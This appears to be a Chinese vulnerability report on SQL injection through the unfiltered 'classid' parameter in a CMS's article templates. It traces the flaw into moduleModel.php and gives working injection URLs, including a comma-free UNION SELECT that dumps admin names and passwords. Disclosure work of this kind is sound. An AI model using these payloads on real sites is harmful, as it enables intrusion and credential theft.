### 简要描述: 过滤不严,绕过并注入 ### 详细说明: Template/article.html和Template/article_class.html中 {$classid=$_GET[‘classid’]}//直接GET传入 ``` <div class="home_box"> <div class="boxtitle"> <h3>最新推荐</h3> </div> <ul class="list_12"> {loop M("module")->l("article","w[classid='$classid'&&attrib_j=1&&status=1];f[title,html,date];n[10];s[id,1]") $k $v} //classid直接带入查询 <li><span>{date('m/d',strtotime($v['date']))}</span><a href="{url($v['html'])}">{$v['title']}</a></li> {/loop} </ul> </div> 下面的一样,就省略了 ``` 这里显然已经有注入的潜质了,就看后面查询的时候有无过滤,试试直接报错注入 http://localhost/?controller=classify&project=article&classify=&classid=1'%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)# [<img src="https://images.seebug.org/upload/201408/111016237019335eecabf8ab07d01de400be9588.png" alt="QQ截图20140811101536.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/111016237019335eecabf8ab07d01de400be9588.png)...
### 简要描述: 过滤不严,绕过并注入 ### 详细说明: Template/article.html和Template/article_class.html中 {$classid=$_GET[‘classid’]}//直接GET传入 ``` <div class="home_box"> <div class="boxtitle"> <h3>最新推荐</h3> </div> <ul class="list_12"> {loop M("module")->l("article","w[classid='$classid'&&attrib_j=1&&status=1];f[title,html,date];n[10];s[id,1]") $k $v} //classid直接带入查询 <li><span>{date('m/d',strtotime($v['date']))}</span><a href="{url($v['html'])}">{$v['title']}</a></li> {/loop} </ul> </div> 下面的一样,就省略了 ``` 这里显然已经有注入的潜质了,就看后面查询的时候有无过滤,试试直接报错注入 http://localhost/?controller=classify&project=article&classify=&classid=1'%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)# [<img src="https://images.seebug.org/upload/201408/111016237019335eecabf8ab07d01de400be9588.png" alt="QQ截图20140811101536.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/111016237019335eecabf8ab07d01de400be9588.png) Message:Invalid SQL:select title,html,date from f_article where classid='1' and (select 1 from (select count(*) and (classid = "concat(version()") order by id desc limit 10 竟然给我变成了 and (classid = "concat(version()") 。什么玩意?? 不过这里已经看出来数据库表的前缀f_了。 继续跟,看看怎么回事。 定位model/moduleModel.php中函数l: ``` public function l($table,$func=""){ $array=explode(";",$func); if(count($array)>1){ foreach($array as $v){ $this->tagsresolve($v); } }else{ $this->tagsresolve($func); } 。。。。 return D($table)->field($field)->where($where)->sort($sortf,$sorts,$sortp)->limit($limit)->getall(); ``` tagsresolve函数对传过来的参数进行处理了,继续跟tagsresolve函数: ``` private function tagsresolve($string){ $str=substr(substr($string,2),0,-1); switch(substr($string,0,1)){ case "w": //w时 $exp=explode(',',$str);//这里用逗号分割 if($exp[1]){//如果我们的语句中有逗号,就会被处理 return $this->op['where']=$exp[0].$this->whereclass($exp[1]); }elseif($str){ return $this->op['where']=$str; } break; ``` whereclass就不继续跟进了 既然把没有逗号了,那就不用好了,见证明 ### 漏洞证明: http://localhost/?controller=classify&project=article&classify=&classid=2'%20%20UNION%20SELECT%20*%20FROM%20((SELECT%20admin%20from%20f_manage)a%20JOIN%20(SELECT%202)b%20JOIN%20(SELECT%20password%20from%20f_manage)c)%20%23 [<img src="https://images.seebug.org/upload/201408/1110271942695d828d9fc98f0d2129b376d31c9c.png" alt="QQ截图20140811092820.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/1110271942695d828d9fc98f0d2129b376d31c9c.png)
